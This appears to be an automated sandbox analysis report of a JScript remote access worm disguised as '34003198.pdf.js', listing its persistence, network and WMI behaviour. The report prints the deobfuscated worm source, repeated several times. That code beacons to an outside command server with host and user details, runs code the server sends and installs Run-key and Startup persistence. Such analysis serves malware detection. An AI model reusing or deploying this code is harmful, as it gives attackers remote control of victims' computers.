                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "|V|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("|U|","|V|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "|V|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("|U|","|V|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "|V|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("|U|","|V|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell","Scripting.FileSystemObject","Shell.Application","Microsoft.XMLHTTP"];var g = ["HKCU","HKLM","HKCU\\vjw0rm","\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\","HKLM\\SOFTWARE\\Classes\\","REG_SZ","\\defaulticon\\"];var y = ["winmgmts:","win32_logicaldisk","Win32_OperatingSystem",'AntiVirusProduct'];var sh = Cr(0);var fs = Cr(1);var spl = "|V|";var Ch = "\\";var VN = "JUNE" + "_" + Ob(6);var fu = WScript.ScriptFullName;var wn = WScript.ScriptName;var U;try {U = sh.RegRead(g[2]);} catch(err) {var sv = fu.split("\\");if (":\\" + sv[1] == ":\\" + wn) {U = "TRUE";sh.RegWrite(g[2],U,g[5]);} else {U = "FALSE";sh.RegWrite(g[2],U,g[5]);}}Ns();do {try {var P = Pt('Vre','');P = P.split(spl);if (P[0] === "Cl") {WScript.Quit(1);}if (P[0] === "Sc") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}if (P[0] === "Ex") {eval(P[1]);}if (P[0] === "Rn") {var ri = fs.OpenTextFile(fu,1);var fr = ri.ReadAll();ri.Close();VN = VN.split("_");fr = fr.replace(VN[0],P[1]);var wi = fs.OpenTextFile(fu,2,false);wi.Write(fr);wi.Close();sh.run("wscript.exe //B \"" + fu + "\"");WScript.Quit(1);}if (P[0] === "Up") {var s2 = Ex("temp") + "\\" + P[2];var ctf = fs.CreateTextFile(s2,true);var gu = P[1];gu = gu.replace("|U|","|V|");ctf.Write(gu);ctf.Close();sh.run("wscript.exe //B \"" + s2 + "\"",6);WScript.Quit(1);}if (P[0] === "Un") {var s2 = P[1];var vdr = fu;var regi = "Nothing!";s2 = s2.replace("%f",fu).replace("%n",wn).replace("%sfdr",vdr).replace("%RgNe%",regi);eval(s2);WScript.Quit(1);}if (P[0] === "RF") {var s2 = Ex("temp") + "\\" + P[2];var fi = fs.CreateTextFile(s2,true);fi.Write(P[1]);fi.Close();sh.run(s2);}} catch(err) {}WScript.Sleep(7000);} while (true) ;function Ex(S) {return sh.ExpandEnvironmentStrings("%" + S + "%");}function Pt(C,A) {var X = Cr(3);X.open('POST','http://jemyy.theworkpc.com:5401/' + C, false);X.SetRequestHeader("User-Agent:",nf());X.send(A);return X.responsetext;}function nf() {var s,NT,i;if (fs.fileexists(Ex("Windir") + "\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe")) {NT ="YES";} else {NT = "NO";}s = VN + Ch + Ex("COMPUTERNAME") + Ch + Ex("USERNAME") + Ch + Ob(2) + Ch + Ob(4) + Ch + Ch + NT + Ch + U + Ch;return s;}function Cr(N) {return new ActiveXObject(j[N]);}function Ob(N) {var s;if (N == 2) {s = GetObject(y[0]).InstancesOf(y[2]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();return it.Caption;break;}}if (N == 4) {var wmg = "winmgmts:\\\\localhost\\root\\securitycenter";s = GetObject(wmg).InstancesOf(y[3]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();var str = it.DisplayName;}if (str !== '') {wmg = wmg + "2";s = GetObject(wmg).InstancesOf(y[3]);en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {it = en.item();return it.DisplayName;}} else {return it.DisplayName;}}if (N==6) {s = GetObject(y[0]).InstancesOf(y[1]);var en = new Enumerator(s);for (; !en.atEnd();en.moveNext()) {var it = en.item();

                        Boot Survival

                        barindex
                        Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198Jump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.jsJump to dropped file
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.jsJump to dropped file
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.jsJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.jsJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.jsJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATAJump to behavior
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js\:Zone.Identifier:$DATA
                        Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198Jump to behavior
                        Source: C:\Windows\System32\wscript.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 34003198Jump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: Possible double extension: pdf.jsStatic PE information: 34003198.pdf.js
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 5401
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 1604
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 1604
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_logicaldisk
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
                        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : win32_logicaldisk
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
